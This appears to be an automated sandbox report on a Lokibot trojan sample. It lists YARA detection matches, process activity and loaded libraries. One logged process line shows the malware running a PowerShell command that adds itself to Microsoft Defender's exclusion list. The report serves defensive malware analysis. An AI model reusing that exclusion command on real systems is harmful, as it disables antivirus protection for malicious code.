Source: file.exe, 00000000.00000002.1892387132.00000000037F3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs file.exe
Source: file.exe, 00000000.00000002.1897973404.0000000004F70000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs file.exe
Source: file.exe, 00000000.00000002.1901699048.00000000070F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs file.exe
Source: file.exe, 00000000.00000000.1863082512.0000000000284000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamefSLi.exe6 vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenamefSLi.exe6 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.file.exe.37bf1e0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.file.exe.37bf1e0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.file.exe.37bf1e0.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.file.exe.37bf1e0.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.file.exe.37d9200.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.file.exe.37d9200.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.file.exe.37d9200.2.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.file.exe.37d9200.2.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 3.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 3.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 3.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.file.exe.37bf1e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.file.exe.37bf1e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.file.exe.37bf1e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.file.exe.37bf1e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.file.exe.37bf1e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.file.exe.37d9200.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.file.exe.37d9200.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.file.exe.37d9200.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.file.exe.37d9200.2.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.file.exe.37d9200.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 3.2.file.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 3.2.file.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 3.2.file.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 3.2.file.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.file.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1892387132.00000000037D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.3130771198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1892048069.0000000002631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1892387132.0000000003639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1892387132.0000000003639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1892387132.0000000003639000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: file.exe PID: 7524, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: file.exe PID: 7716, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.file.exe.70f0000.5.raw.unpack, BE5k0LFu5KnoWIB8ne.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.381d400.3.raw.unpack, BE5k0LFu5KnoWIB8ne.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.70f0000.5.raw.unpack, KQkH3in3AYxtB1JkcI.cs	Security API names: _0020.SetAccessControl
Source: 0.2.file.exe.70f0000.5.raw.unpack, KQkH3in3AYxtB1JkcI.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.70f0000.5.raw.unpack, KQkH3in3AYxtB1JkcI.cs	Security API names: _0020.AddAccessRule
Source: 0.2.file.exe.381d400.3.raw.unpack, KQkH3in3AYxtB1JkcI.cs	Security API names: _0020.SetAccessControl
Source: 0.2.file.exe.381d400.3.raw.unpack, KQkH3in3AYxtB1JkcI.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.381d400.3.raw.unpack, KQkH3in3AYxtB1JkcI.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/8@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 3_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,

3_2_0040650A

Source: C:\Users\user\Desktop\file.exe

Code function: 3_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

3_2_0040434D

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_asw2dfr5.xlk.ps1

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

ReversingLabs: Detection: 71%

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
